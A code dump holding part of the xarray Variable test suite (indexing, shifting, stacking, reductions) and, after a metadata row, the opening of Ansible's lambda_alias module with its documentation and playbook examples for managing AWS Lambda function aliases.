self.assertEqual(v.dtype, np.dtype('datetime64[ns]'))
self.assertEqual(v.values, expected)
self.assertEqual(v.values.dtype, np.dtype('datetime64[ns]'))
def test_timedelta64_conversion_scalar(self):
expected = np.timedelta64(24 * 60 * 60 * 10 ** 9, 'ns')
for values in [
np.timedelta64(1, 'D'),
pd.Timedelta('1 day'),
timedelta(days=1),
]:
v = Variable([], values)
self.assertEqual(v.dtype, np.dtype('timedelta64[ns]'))
self.assertEqual(v.values, expected)
self.assertEqual(v.values.dtype, np.dtype('timedelta64[ns]'))
def test_0d_str(self):
v = Variable([], u'foo')
self.assertEqual(v.dtype, np.dtype('U3'))
self.assertEqual(v.values, 'foo')
v = Variable([], np.string_('foo'))
self.assertEqual(v.dtype, np.dtype('S3'))
self.assertEqual(v.values, bytes('foo', 'ascii') if PY3 else 'foo')
def test_0d_datetime(self):
v = Variable([], pd.Timestamp('2000-01-01'))
self.assertEqual(v.dtype, np.dtype('datetime64[ns]'))
self.assertEqual(v.values, np.datetime64('2000-01-01T00Z', 'ns'))
def test_0d_timedelta(self):
for td in [pd.to_timedelta('1s'), np.timedelta64(1, 's')]:
v = Variable([], td)
self.assertEqual(v.dtype, np.dtype('timedelta64[ns]'))
self.assertEqual(v.values, np.timedelta64(10 ** 9, 'ns'))
def test_equals_and_identical(self):
d = np.random.rand(10, 3)
d[0, 0] = np.nan
v1 = Variable(('dim1', 'dim2'), data=d,
attrs={'att1': 3, 'att2': [1, 2, 3]})
v2 = Variable(('dim1', 'dim2'), data=d,
attrs={'att1': 3, 'att2': [1, 2, 3]})
self.assertTrue(v1.equals(v2))
self.assertTrue(v1.identical(v2))
v3 = Variable(('dim1', 'dim3'), data=d)
self.assertFalse(v1.equals(v3))
v4 = Variable(('dim1', 'dim2'), data=d)
self.assertTrue(v1.equals(v4))
self.assertFalse(v1.identical(v4))
v5 = deepcopy(v1)
v5.values[:] = np.random.rand(10, 3)
self.assertFalse(v1.equals(v5))
self.assertFalse(v1.equals(None))
self.assertFalse(v1.equals(d))
self.assertFalse(v1.identical(None))
self.assertFalse(v1.identical(d))
def test_broadcast_equals(self):
v1 = Variable((), np.nan)
v2 = Variable(('x'), [np.nan, np.nan])
self.assertTrue(v1.broadcast_equals(v2))
self.assertFalse(v1.equals(v2))
self.assertFalse(v1.identical(v2))
v3 = Variable(('x'), [np.nan])
self.assertTrue(v1.broadcast_equals(v3))
self.assertFalse(v1.equals(v3))
self.assertFalse(v1.identical(v3))
self.assertFalse(v1.broadcast_equals(None))
v4 = Variable(('x'), [np.nan] * 3)
self.assertFalse(v2.broadcast_equals(v4))
def test_no_conflicts(self):
v1 = Variable(('x'), [1, 2, np.nan, np.nan])
v2 = Variable(('x'), [np.nan, 2, 3, np.nan])
self.assertTrue(v1.no_conflicts(v2))
self.assertFalse(v1.equals(v2))
self.assertFalse(v1.broadcast_equals(v2))
self.assertFalse(v1.identical(v2))
self.assertFalse(v1.no_conflicts(None))
v3 = Variable(('y'), [np.nan, 2, 3, np.nan])
self.assertFalse(v3.no_conflicts(v1))
d = np.array([1, 2, np.nan, np.nan])
self.assertFalse(v1.no_conflicts(d))
self.assertFalse(v2.no_conflicts(d))
v4 = Variable(('w', 'x'), [d])
self.assertTrue(v1.no_conflicts(v4))
def test_as_variable(self):
data = np.arange(10)
expected = Variable('x', data)
expected_extra = Variable('x', data, attrs={'myattr': 'val'},
encoding={'scale_factor': 1})
self.assertVariableIdentical(expected, as_variable(expected))
ds = Dataset({'x': expected})
var = as_variable(ds['x']).to_base_variable()
self.assertVariableIdentical(expected, var)
self.assertNotIsInstance(ds['x'], Variable)
self.assertIsInstance(as_variable(ds['x']), Variable)
FakeVariable = namedtuple('FakeVariable', 'values dims')
fake_xarray = FakeVariable(expected.values, expected.dims)
self.assertVariableIdentical(expected, as_variable(fake_xarray))
FakeVariable = namedtuple('FakeVariable', 'data dims')
fake_xarray = FakeVariable(expected.data, expected.dims)
self.assertVariableIdentical(expected, as_variable(fake_xarray))
FakeVariable = namedtuple('FakeVariable',
'data values dims attrs encoding')
fake_xarray = FakeVariable(expected_extra.data, expected_extra.values,
expected_extra.dims, expected_extra.attrs,
expected_extra.encoding)
self.assertVariableIdentical(expected_extra, as_variable(fake_xarray))
xarray_tuple = (expected_extra.dims, expected_extra.values,
expected_extra.attrs, expected_extra.encoding)
self.assertVariableIdentical(expected_extra, as_variable(xarray_tuple))
with self.assertRaisesRegexp(TypeError, 'tuples to convert'):
as_variable(tuple(data))
with self.assertRaisesRegexp(
TypeError, 'without an explicit list of dimensions'):
as_variable(data)
actual = as_variable(data, name='x')
self.assertVariableIdentical(expected.to_index_variable(), actual)
actual = as_variable(0)
expected = Variable([], 0)
self.assertVariableIdentical(expected, actual)
data = np.arange(9).reshape((3, 3))
expected = Variable(('x', 'y'), data)
with self.assertRaisesRegexp(
ValueError, 'without explicit dimension names'):
as_variable(data, name='x')
with self.assertRaisesRegexp(
ValueError, 'has more than 1-dimension'):
as_variable(expected, name='x')
def test_repr(self):
v = Variable(['time', 'x'], [[1, 2, 3], [4, 5, 6]], {'foo': 'bar'})
expected = dedent("""
<xarray.Variable (time: 2, x: 3)>
array([[1, 2, 3],
[4, 5, 6]])
Attributes:
foo: bar
""").strip()
self.assertEqual(expected, repr(v))
def test_repr_lazy_data(self):
v = Variable('x', LazilyIndexedArray(np.arange(2e5)))
self.assertIn('200000 values with dtype', repr(v))
self.assertIsInstance(v._data, LazilyIndexedArray)
def test_items(self):
data = np.random.random((10, 11))
v = Variable(['x', 'y'], data)
# test slicing
self.assertVariableIdentical(v, v[:])
self.assertVariableIdentical(v, v[...])
self.assertVariableIdentical(Variable(['y'], data[0]), v[0])
self.assertVariableIdentical(Variable(['x'], data[:, 0]), v[:, 0])
self.assertVariableIdentical(Variable(['x', 'y'], data[:3, :2]),
v[:3, :2])
# test array indexing
x = Variable(['x'], np.arange(10))
y = Variable(['y'], np.arange(11))
self.assertVariableIdentical(v, v[x.values])
self.assertVariableIdentical(v, v[x])
self.assertVariableIdentical(v[:3], v[x < 3])
self.assertVariableIdentical(v[:, 3:], v[:, y >= 3])
self.assertVariableIdentical(v[:3, 3:], v[x < 3, y >= 3])
self.assertVariableIdentical(v[:3, :2], v[x[:3], y[:2]])
self.assertVariableIdentical(v[:3, :2], v[range(3), range(2)])
# test iteration
for n, item in enumerate(v):
self.assertVariableIdentical(Variable(['y'], data[n]), item)
with self.assertRaisesRegexp(TypeError, 'iteration over a 0-d'):
iter(Variable([], 0))
# test setting
v.values[:] = 0
self.assertTrue(np.all(v.values == 0))
# test orthogonal setting
v[range(10), range(11)] = 1
self.assertArrayEqual(v.values, np.ones((10, 11)))
def test_isel(self):
v = Variable(['time', 'x'], self.d)
self.assertVariableIdentical(v.isel(time=slice(None)), v)
self.assertVariableIdentical(v.isel(time=0), v[0])
self.assertVariableIdentical(v.isel(time=slice(0, 3)), v[:3])
self.assertVariableIdentical(v.isel(x=0), v[:, 0])
with self.assertRaisesRegexp(ValueError, 'do not exist'):
v.isel(not_a_dim=0)
def test_index_0d_numpy_string(self):
# regression test to verify our work around for indexing 0d strings
v = Variable([], np.string_('asdf'))
self.assertVariableIdentical(v[()], v)
v = Variable([], np.unicode_(u'asdf'))
self.assertVariableIdentical(v[()], v)
def test_indexing_0d_unicode(self):
# regression test for GH568
actual = Variable(('x'), [u'tmax'])[0][()]
expected = Variable((), u'tmax')
self.assertVariableIdentical(actual, expected)
def test_shift(self):
v = Variable('x', [1, 2, 3, 4, 5])
self.assertVariableIdentical(v, v.shift(x=0))
self.assertIsNot(v, v.shift(x=0))
expected = Variable('x', [np.nan, 1, 2, 3, 4])
self.assertVariableIdentical(expected, v.shift(x=1))
expected = Variable('x', [np.nan, np.nan, 1, 2, 3])
self.assertVariableIdentical(expected, v.shift(x=2))
expected = Variable('x', [2, 3, 4, 5, np.nan])
self.assertVariableIdentical(expected, v.shift(x=-1))
expected = Variable('x', [np.nan] * 5)
self.assertVariableIdentical(expected, v.shift(x=5))
self.assertVariableIdentical(expected, v.shift(x=6))
with self.assertRaisesRegexp(ValueError, 'dimension'):
v.shift(z=0)
v = Variable('x', [1, 2, 3, 4, 5], {'foo': 'bar'})
self.assertVariableIdentical(v, v.shift(x=0))
expected = Variable('x', [np.nan, 1, 2, 3, 4], {'foo': 'bar'})
self.assertVariableIdentical(expected, v.shift(x=1))
def test_shift2d(self):
v = Variable(('x', 'y'), [[1, 2], [3, 4]])
expected = Variable(('x', 'y'), [[np.nan, np.nan], [np.nan, 1]])
self.assertVariableIdentical(expected, v.shift(x=1, y=1))
def test_roll(self):
v = Variable('x', [1, 2, 3, 4, 5])
self.assertVariableIdentical(v, v.roll(x=0))
self.assertIsNot(v, v.roll(x=0))
expected = Variable('x', [5, 1, 2, 3, 4])
self.assertVariableIdentical(expected, v.roll(x=1))
self.assertVariableIdentical(expected, v.roll(x=-4))
self.assertVariableIdentical(expected, v.roll(x=6))
expected = Variable('x', [4, 5, 1, 2, 3])
self.assertVariableIdentical(expected, v.roll(x=2))
self.assertVariableIdentical(expected, v.roll(x=-3))
with self.assertRaisesRegexp(ValueError, 'dimension'):
v.roll(z=0)
def test_roll_consistency(self):
v = Variable(('x', 'y'), np.random.randn(5, 6))
for axis, dim in [(0, 'x'), (1, 'y')]:
for shift in [-3, 0, 1, 7, 11]:
expected = np.roll(v.values, shift, axis=axis)
actual = v.roll(**{dim: shift}).values
self.assertArrayEqual(expected, actual)
def test_transpose(self):
v = Variable(['time', 'x'], self.d)
v2 = Variable(['x', 'time'], self.d.T)
self.assertVariableIdentical(v, v2.transpose())
self.assertVariableIdentical(v.transpose(), v.T)
x = np.random.randn(2, 3, 4, 5)
w = Variable(['a', 'b', 'c', 'd'], x)
w2 = Variable(['d', 'b', 'c', 'a'], np.einsum('abcd->dbca', x))
self.assertEqual(w2.shape, (5, 3, 4, 2))
self.assertVariableIdentical(w2, w.transpose('d', 'b', 'c', 'a'))
self.assertVariableIdentical(w, w2.transpose('a', 'b', 'c', 'd'))
w3 = Variable(['b', 'c', 'd', 'a'], np.einsum('abcd->bcda', x))
self.assertVariableIdentical(w, w3.transpose('a', 'b', 'c', 'd'))
def test_transpose_0d(self):
for value in [
3.5,
('a', 1),
np.datetime64('2000-01-01'),
np.timedelta64(1, 'h'),
None,
object(),
]:
variable = Variable([], value)
actual = variable.transpose()
assert actual.identical(variable)
def test_squeeze(self):
v = Variable(['x', 'y'], [[1]])
self.assertVariableIdentical(Variable([], 1), v.squeeze())
self.assertVariableIdentical(Variable(['y'], [1]), v.squeeze('x'))
self.assertVariableIdentical(Variable(['y'], [1]), v.squeeze(['x']))
self.assertVariableIdentical(Variable(['x'], [1]), v.squeeze('y'))
self.assertVariableIdentical(Variable([], 1), v.squeeze(['x', 'y']))
v = Variable(['x', 'y'], [[1, 2]])
self.assertVariableIdentical(Variable(['y'], [1, 2]), v.squeeze())
self.assertVariableIdentical(Variable(['y'], [1, 2]), v.squeeze('x'))
with self.assertRaisesRegexp(ValueError, 'cannot select a dimension'):
v.squeeze('y')
def test_get_axis_num(self):
v = Variable(['x', 'y', 'z'], np.random.randn(2, 3, 4))
self.assertEqual(v.get_axis_num('x'), 0)
self.assertEqual(v.get_axis_num(['x']), (0,))
self.assertEqual(v.get_axis_num(['x', 'y']), (0, 1))
self.assertEqual(v.get_axis_num(['z', 'y', 'x']), (2, 1, 0))
with self.assertRaisesRegexp(ValueError, 'not found in array dim'):
v.get_axis_num('foobar')
def test_set_dims(self):
v = Variable(['x'], [0, 1])
actual = v.set_dims(['x', 'y'])
expected = Variable(['x', 'y'], [[0], [1]])
self.assertVariableIdentical(actual, expected)
actual = v.set_dims(['y', 'x'])
self.assertVariableIdentical(actual, expected.T)
actual = v.set_dims(OrderedDict([('x', 2), ('y', 2)]))
expected = Variable(['x', 'y'], [[0, 0], [1, 1]])
self.assertVariableIdentical(actual, expected)
v = Variable(['foo'], [0, 1])
actual = v.set_dims('foo')
expected = v
self.assertVariableIdentical(actual, expected)
with self.assertRaisesRegexp(ValueError, 'must be a superset'):
v.set_dims(['z'])
def test_set_dims_object_dtype(self):
v = Variable([], ('a', 1))
actual = v.set_dims(('x',), (3,))
exp_values = np.empty((3,), dtype=object)
for i in range(3):
exp_values[i] = ('a', 1)
expected = Variable(['x'], exp_values)
assert actual.identical(expected)
def test_stack(self):
v = Variable(['x', 'y'], [[0, 1], [2, 3]], {'foo': 'bar'})
actual = v.stack(z=('x', 'y'))
expected = Variable('z', [0, 1, 2, 3], v.attrs)
self.assertVariableIdentical(actual, expected)
actual = v.stack(z=('x',))
expected = Variable(('y', 'z'), v.data.T, v.attrs)
self.assertVariableIdentical(actual, expected)
actual = v.stack(z=(),)
self.assertVariableIdentical(actual, v)
actual = v.stack(X=('x',), Y=('y',)).transpose('X', 'Y')
expected = Variable(('X', 'Y'), v.data, v.attrs)
self.assertVariableIdentical(actual, expected)
def test_stack_errors(self):
v = Variable(['x', 'y'], [[0, 1], [2, 3]], {'foo': 'bar'})
with self.assertRaisesRegexp(ValueError, 'invalid existing dim'):
v.stack(z=('x1',))
with self.assertRaisesRegexp(ValueError, 'cannot create a new dim'):
v.stack(x=('x',))
def test_unstack(self):
v = Variable('z', [0, 1, 2, 3], {'foo': 'bar'})
actual = v.unstack(z=OrderedDict([('x', 2), ('y', 2)]))
expected = Variable(('x', 'y'), [[0, 1], [2, 3]], v.attrs)
self.assertVariableIdentical(actual, expected)
actual = v.unstack(z=OrderedDict([('x', 4), ('y', 1)]))
expected = Variable(('x', 'y'), [[0], [1], [2], [3]], v.attrs)
self.assertVariableIdentical(actual, expected)
actual = v.unstack(z=OrderedDict([('x', 4)]))
expected = Variable('x', [0, 1, 2, 3], v.attrs)
self.assertVariableIdentical(actual, expected)
def test_unstack_errors(self):
v = Variable('z', [0, 1, 2, 3])
with self.assertRaisesRegexp(ValueError, 'invalid existing dim'):
v.unstack(foo={'x': 4})
with self.assertRaisesRegexp(ValueError, 'cannot create a new dim'):
v.stack(z=('z',))
with self.assertRaisesRegexp(ValueError, 'the product of the new dim'):
v.unstack(z={'x': 5})
def test_unstack_2d(self):
v = Variable(['x', 'y'], [[0, 1], [2, 3]])
actual = v.unstack(y={'z': 2})
expected = Variable(['x', 'z'], v.data)
self.assertVariableIdentical(actual, expected)
actual = v.unstack(x={'z': 2})
expected = Variable(['y', 'z'], v.data.T)
self.assertVariableIdentical(actual, expected)
def test_stack_unstack_consistency(self):
v = Variable(['x', 'y'], [[0, 1], [2, 3]])
actual = (v.stack(z=('x', 'y'))
.unstack(z=OrderedDict([('x', 2), ('y', 2)])))
self.assertVariableIdentical(actual, v)
def test_broadcasting_math(self):
x = np.random.randn(2, 3)
v = Variable(['a', 'b'], x)
# 1d to 2d broadcasting
self.assertVariableIdentical(
v * v,
Variable(['a', 'b'], np.einsum('ab,ab->ab', x, x)))
self.assertVariableIdentical(
v * v[0],
Variable(['a', 'b'], np.einsum('ab,b->ab', x, x[0])))
self.assertVariableIdentical(
v[0] * v,
Variable(['b', 'a'], np.einsum('b,ab->ba', x[0], x)))
self.assertVariableIdentical(
v[0] * v[:, 0],
Variable(['b', 'a'], np.einsum('b,a->ba', x[0], x[:, 0])))
# higher dim broadcasting
y = np.random.randn(3, 4, 5)
w = Variable(['b', 'c', 'd'], y)
self.assertVariableIdentical(
v * w, Variable(['a', 'b', 'c', 'd'],
np.einsum('ab,bcd->abcd', x, y)))
self.assertVariableIdentical(
w * v, Variable(['b', 'c', 'd', 'a'],
np.einsum('bcd,ab->bcda', y, x)))
self.assertVariableIdentical(
v * w[0], Variable(['a', 'b', 'c', 'd'],
np.einsum('ab,cd->abcd', x, y[0])))
def test_broadcasting_failures(self):
a = Variable(['x'], np.arange(10))
b = Variable(['x'], np.arange(5))
c = Variable(['x', 'x'], np.arange(100).reshape(10, 10))
with self.assertRaisesRegexp(ValueError, 'mismatched lengths'):
a + b
with self.assertRaisesRegexp(ValueError, 'duplicate dimensions'):
a + c
def test_inplace_math(self):
x = np.arange(5)
v = Variable(['x'], x)
v2 = v
v2 += 1
self.assertIs(v, v2)
# since we provided an ndarray for data, it is also modified in-place
self.assertIs(source_ndarray(v.values), x)
self.assertArrayEqual(v.values, np.arange(5) + 1)
with self.assertRaisesRegexp(ValueError, 'dimensions cannot change'):
v += Variable('y', np.arange(5))
def test_reduce(self):
v = Variable(['x', 'y'], self.d, {'ignored': 'attributes'})
self.assertVariableIdentical(v.reduce(np.std, 'x'),
Variable(['y'], self.d.std(axis=0)))
self.assertVariableIdentical(v.reduce(np.std, axis=0),
v.reduce(np.std, dim='x'))
self.assertVariableIdentical(v.reduce(np.std, ['y', 'x']),
Variable([], self.d.std(axis=(0, 1))))
self.assertVariableIdentical(v.reduce(np.std),
Variable([], self.d.std()))
self.assertVariableIdentical(
v.reduce(np.mean, 'x').reduce(np.std, 'y'),
Variable([], self.d.mean(axis=0).std()))
self.assertVariableAllClose(v.mean('x'), v.reduce(np.mean, 'x'))
with self.assertRaisesRegexp(ValueError, 'cannot supply both'):
v.mean(dim='x', axis=0)
@pytest.mark.skipif(LooseVersion(np.__version__) < LooseVersion('1.10.0'),
reason='requires numpy version 1.10.0 or later')
def test_quantile(self):
v = Variable(['x', 'y'], self.d)
for q in [0.25, [0.50], [0.25, 0.75]]:
for axis, dim in zip([None, 0, [0], [0, 1]],
[None, 'x', ['x'], ['x', 'y']]):
actual = v.quantile(q, dim=dim)
expected = np.nanpercentile(self.d, np.array(q) * 100,
axis=axis)
np.testing.assert_allclose(actual.values, expected)
@requires_dask
def test_quantile_dask_raises(self):
# regression for GH1524
v = Variable(['x', 'y'], self.d).chunk(2)
with self.assertRaisesRegexp(TypeError, 'arrays stored as dask'):
v.quantile(0.5, dim='x')
def test_big_endian_reduce(self):
# regression test for GH489
data = np.ones(5, dtype='>f4')
v = Variable(['x'], data)
expected = Variable([], 5)
self.assertVariableIdentical(expected, v.sum())
def test_reduce_funcs(self):
v = Variable('x', np.array([1, np.nan, 2, 3]))
self.assertVariableIdentical(v.mean(), Variable([], 2))
self.assertVariableIdentical(v.mean(skipna=True), Variable([], 2))
self.assertVariableIdentical(v.mean(skipna=False), Variable([], np.nan))
self.assertVariableIdentical(np.mean(v), Variable([], 2))
self.assertVariableIdentical(v.prod(), Variable([], 6))
self.assertVariableIdentical(v.cumsum(axis=0),
Variable('x', np.array([1, 1, 3, 6])))
self.assertVariableIdentical(v.cumprod(axis=0),
Variable('x', np.array([1, 1, 2, 6])))
self.assertVariableIdentical(v.var(), Variable([], 2.0 / 3))
if LooseVersion(np.__version__) < '1.9':
with self.assertRaises(NotImplementedError):
v.median()
else:
self.assertVariableIdentical(v.median(), Variable([], 2))
v = Variable('x', [True, False, False])
self.assertVariableIdentical(v.any(), Variable([], True))
self.assertVariableIdentical(v.all(dim='x'), Variable([], False))
v = Variable('t', pd.date_range('2000-01-01', periods=3))
with self.assertRaises(NotImplementedError):
v.max(skipna=True)
self.assertVariableIdentical(
v.max(), Variable([], pd.Timestamp('2000-01-03')))
def test_reduce_keep_attrs(self):
_attrs = {'units': 'test', 'long_name': 'testing'}
v = Variable(['x', 'y'], self.d, _attrs)
# Test dropped attrs
vm = v.mean()
self.assertEqual(len(vm.attrs), 0)
self.assertEqual(vm.attrs, OrderedDict())
# Test kept attrs
vm = v.mean(keep_attrs=True)
self.assertEqual(len(vm.attrs), len(_attrs))
self.assertEqual(vm.attrs, _attrs)
def test_count(self):
expected = Variable([], 3)
actual = Variable(['x'], [1, 2, 3, np.nan]).count()
self.assertVariableIdentical(expected, actual)
v = Variable(['x'], np.array(['1', '2', '3', np.nan], dtype=object))
actual = v.count()
self.assertVariableIdentical(expected, actual)
actual = Variable(['x'], [True, False, True]).count()
self.assertVariableIdentical(expected, actual)
self.assertEqual(actual.dtype, int)
expected = Variable(['x'], [2, 3])
actual = Variable(['x', 'y'], [[1, 0, np.nan], [1, 1, 1]]).count('y')
self.assertVariableIdentical(expected, actual)
class TestIndexVariable(TestCase, VariableSubclassTestCases):
cls = staticmethod(IndexVariable)
def test_init(self):
with self.assertRaisesRegexp(ValueError, 'must be 1-dimensional'):
IndexVariable((), 0)
def test_to_index(self):
data = 0.5 * np.arange(10)
v = IndexVariable(['time'], data, {'foo': 'bar'})
self.assertTrue(pd.Index(data, name='time').identical(v.to_index()))
def test_multiindex_default_level_names(self):
midx = pd.MultiIndex.from_product([['a', 'b'], [1, 2]])
v = IndexVariable(['x'], midx, {'foo': 'bar'})
self.assertEqual(v.to_index().names, ('x_level_0', 'x_level_1'))
def test_data(self):
x = IndexVariable('x', np.arange(3.0))
self.assertIsInstance(x._data, PandasIndexAdapter)
self.assertIsInstance(x.data, np.ndarray)
self.assertEqual(float, x.dtype)
self.assertArrayEqual(np.arange(3), x)
self.assertEqual(float, x.values.dtype)
with self.assertRaisesRegexp(TypeError, 'cannot be modified'):
x[:] = 0
def test_name(self):
coord = IndexVariable('x', [10.0])
self.assertEqual(coord.name, 'x')
with self.assertRaises(AttributeError):
coord.name = 'y'
def test_level_names(self):
midx = pd.MultiIndex.from_product([['a', 'b'], [1, 2]],
names=['level_1', 'level_2'])
x = IndexVariable('x', midx)
self.assertEqual(x.level_names, midx.names)
self.assertIsNone(IndexVariable('y', [10.0]).level_names)
def test_get_level_variable(self):
midx = pd.MultiIndex.from_product([['a', 'b'], [1, 2]],
names=['level_1', 'level_2'])
x = IndexVariable('x', midx)
level_1 = IndexVariable('x', midx.get_level_values('level_1'))
self.assertVariableIdentical(x.get_level_variable('level_1'), level_1)
with self.assertRaisesRegexp(ValueError, 'has no MultiIndex'):
IndexVariable('y', [10.0]).get_level_variable('level')
def test_concat_periods(self):
periods = pd.period_range('2000-01-01', periods=10)
coords = [IndexVariable('t', periods[:5]), IndexVariable('t', periods[5:])]
expected = IndexVariable('t', periods)
actual = IndexVariable.concat(coords, dim='t')
assert actual.identical(expected)
assert isinstance(actual.to_index(), pd.PeriodIndex)
positions = [list(range(5)), list(range(5, 10))]
actual = IndexVariable.concat(coords, dim='t', positions=positions)
assert actual.identical(expected)
assert isinstance(actual.to_index(), pd.PeriodIndex)
def test_concat_multiindex(self):
idx = pd.MultiIndex.from_product([[0, 1, 2], ['a', 'b']])
coords = [IndexVariable('x', idx[:2]), IndexVariable('x', idx[2:])]
expected = IndexVariable('x', idx)
actual = IndexVariable.concat(coords, dim='x')
assert actual.identical(expected)
assert isinstance(actual.to_index(), pd.MultiIndex)
def test_coordinate_alias(self):
with self.assertWarns('deprecated'):
x = Coordinate('x', [1, 2, 3])
self.assertIsInstance(x, IndexVariable)
class TestAsCompatibleData(TestCase):
def test_unchanged_types(self):
types = (np.asarray, PandasIndexAdapter, indexing.LazilyIndexedArray)
for t in types:
for data in [np.arange(3),
pd.date_range('2000-01-01', periods=3),
pd.date_range('2000-01-01', periods=3).values]:
x = t(data)
self.assertIs(source_ndarray(x),
source_ndarray(as_compatible_data(x)))
def test_converted_types(self):
for input_array in [[[0, 1, 2]], pd.DataFrame([[0, 1, 2]])]:
actual = as_compatible_data(input_array)
self.assertArrayEqual(np.asarray(input_array), actual)
self.assertEqual(np.ndarray, type(actual))
self.assertEqual(np.asarray(input_array).dtype, actual.dtype)
def test_masked_array(self):
original = np.ma.MaskedArray(np.arange(5))
expected = np.arange(5)
actual = as_compatible_data(original)
self.assertArrayEqual(expected, actual)
self.assertEqual(np.dtype(int), actual.dtype)
original = np.ma.MaskedArray(np.arange(5), mask=4 * [False] + [True])
expected = np.arange(5.0)
expected[-1] = np.nan
actual = as_compatible_data(original)
self.assertArrayEqual(expected, actual)
self.assertEqual(np.dtype(float), actual.dtype)
def test_datetime(self):
expected = np.datetime64('2000-01-01T00Z')
actual = as_compatible_data(expected)
self.assertEqual(expected, actual)
self.assertEqual(np.ndarray, type(actual))
self.assertEqual(np.dtype('datetime64[ns]'), actual.dtype)
expected = np.array([np.datetime64('2000-01-01T00Z')])
actual = as_compatible_data(expected)
self.assertEqual(np.asarray(expected), actual)
self.assertEqual(np.ndarray, type(actual))
self.assertEqual(np.dtype('datetime64[ns]'), actual.dtype)
expected = np.array([np.datetime64('2000-01-01T00Z', 'ns')])
actual = as_compatible_data(expected)
self.assertEqual(np.asarray(expected), actual)
self.assertEqual(np.ndarray, type(actual))
self.assertEqual(np.dtype('datetime64[ns]'), actual.dtype)
self.assertIs(expected, source_ndarray(np.asarray(actual)))
expected = np.datetime64('2000-01-01T00Z', 'ns')
actual = as_compatible_data(datetime(2000, 1, 1))
self.assertEqual(np.asarray(expected), actual)
self.assertEqual(np.ndarray, type(actual))
self.assertEqual(np.dtype('datetime64[ns]'), actual.dtype)
def test_full_like(self):
# For more thorough tests, see test_variable.py
orig = Variable(dims=('x', 'y'), data=[[1.5, 2.0], [3.1, 4.3]],
attrs={'foo': 'bar'})
expect = orig.copy(deep=True)
expect.values = [[2.0, 2.0], [2.0, 2.0]]
self.assertVariableIdentical(expect, full_like(orig, 2))
# override dtype
expect.values = [[True, True], [True, True]]
self.assertEqual(expect.dtype, bool)
self.assertVariableIdentical(expect, full_like(orig, True, dtype=bool))
@requires_dask
def test_full_like_dask(self):
orig = Variable(dims=('x', 'y'), data=[[1.5, 2.0], [3.1, 4.3]],
attrs={'foo': 'bar'}).chunk(((1, 1), (2,)))
def check(actual, expect_dtype, expect_values):
self.assertEqual(actual.dtype, expect_dtype)
self.assertEqual(actual.shape, orig.shape)
self.assertEqual(actual.dims, orig.dims)
self.assertEqual(actual.attrs, orig.attrs)
self.assertEqual(actual.chunks, orig.chunks)
self.assertArrayEqual(actual.values, expect_values)
check(full_like(orig, 2),
orig.dtype, np.full_like(orig.values, 2))
# override dtype
check(full_like(orig, True, dtype=bool),
bool, np.full_like(orig.values, True, dtype=bool))
# Check that there's no array stored inside dask
# (e.g. we didn't create a numpy array and then we chunked it!)
dsk = full_like(orig, 1).data.dask
for v in dsk.values():
if isinstance(v, tuple):
for vi in v:
assert not isinstance(vi, np.ndarray)
else:
assert not isinstance(v, np.ndarray)
def test_zeros_like(self):
orig = Variable(dims=('x', 'y'), data=[[1.5, 2.0], [3.1, 4.3]],
attrs={'foo': 'bar'})
self.assertVariableIdentical(zeros_like(orig),
full_like(orig, 0))
self.assertVariableIdentical(zeros_like(orig, dtype=int),
full_like(orig, 0, dtype=int))
def test_ones_like(self):
orig = Variable(dims=('x', 'y'), data=[[1.5, 2.0], [3.1, 4.3]],
attrs={'foo': 'bar'})
self.assertVariableIdentical(ones_like(orig),
full_like(orig, 1))
self.assertVariableIdentical(ones_like(orig, dtype=int),
full_like(orig, 1, dtype=int))
| apache-2.0 | 5,645,038,719,097,120,000 | 40.735907 | 95 | 0.560465 | false |
maxamillion/ansible-modules-extras | cloud/amazon/lambda_alias.py | 25 | 12180 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
try:
import boto3
from botocore.exceptions import ClientError, ParamValidationError, MissingParametersError
HAS_BOTO3 = True
except ImportError:
HAS_BOTO3 = False
DOCUMENTATION = '''
---
module: lambda_alias
short_description: Creates, updates or deletes AWS Lambda function aliases.
description:
- This module allows the management of AWS Lambda functions aliases via the Ansible
framework. It is idempotent and supports "Check" mode. Use module M(lambda) to manage the lambda function
itself and M(lambda_event) to manage event source mappings.
version_added: "2.2"
author: Pierre Jodouin (@pjodouin), Ryan Scott Brown (@ryansb)
options:
function_name:
description:
- The name of the function alias.
required: true
state:
description:
- Describes the desired state.
required: true
default: "present"
choices: ["present", "absent"]
name:
description:
- Name of the function alias.
required: true
aliases: ['alias_name']
description:
description:
- A short, user-defined function alias description.
required: false
version:
description:
- Version associated with the Lambda function alias.
A value of 0 (or omitted parameter) sets the alias to the $LATEST version.
required: false
aliases: ['function_version']
requirements:
- boto3
extends_documentation_fragment:
- aws
'''
EXAMPLES = '''
---
# Simple example to create a lambda function and publish a version
- hosts: localhost
gather_facts: no
vars:
state: present
project_folder: /path/to/deployment/package
deployment_package: lambda.zip
account: 123456789012
production_version: 5
tasks:
- name: AWS Lambda Function
lambda:
state: "{{ state | default('present') }}"
name: myLambdaFunction
publish: True
description: lambda function description
code_s3_bucket: package-bucket
code_s3_key: "lambda/{{ deployment_package }}"
local_path: "{{ project_folder }}/{{ deployment_package }}"
runtime: python2.7
timeout: 5
handler: lambda.handler
memory_size: 128
role: "arn:aws:iam::{{ account }}:role/API2LambdaExecRole"
- name: show results
debug: var=lambda_facts
# The following will set the Dev alias to the latest version ($LATEST) since version is omitted (or = 0)
- name: "alias 'Dev' for function {{ lambda_facts.FunctionName }} "
lambda_alias:
state: "{{ state | default('present') }}"
function_name: "{{ lambda_facts.FunctionName }}"
name: Dev
description: Development is $LATEST version
# The QA alias will only be created when a new version is published (i.e. not = '$LATEST')
- name: "alias 'QA' for function {{ lambda_facts.FunctionName }} "
lambda_alias:
state: "{{ state | default('present') }}"
function_name: "{{ lambda_facts.FunctionName }}"
name: QA
version: "{{ lambda_facts.Version }}"
description: "QA is version {{ lambda_facts.Version }}"
when: lambda_facts.Version != "$LATEST"
# The Prod alias will have a fixed version based on a variable
- name: "alias 'Prod' for function {{ lambda_facts.FunctionName }} "
lambda_alias:
state: "{{ state | default('present') }}"
function_name: "{{ lambda_facts.FunctionName }}"
name: Prod
version: "{{ production_version }}"
description: "Production is version {{ production_version }}"
'''
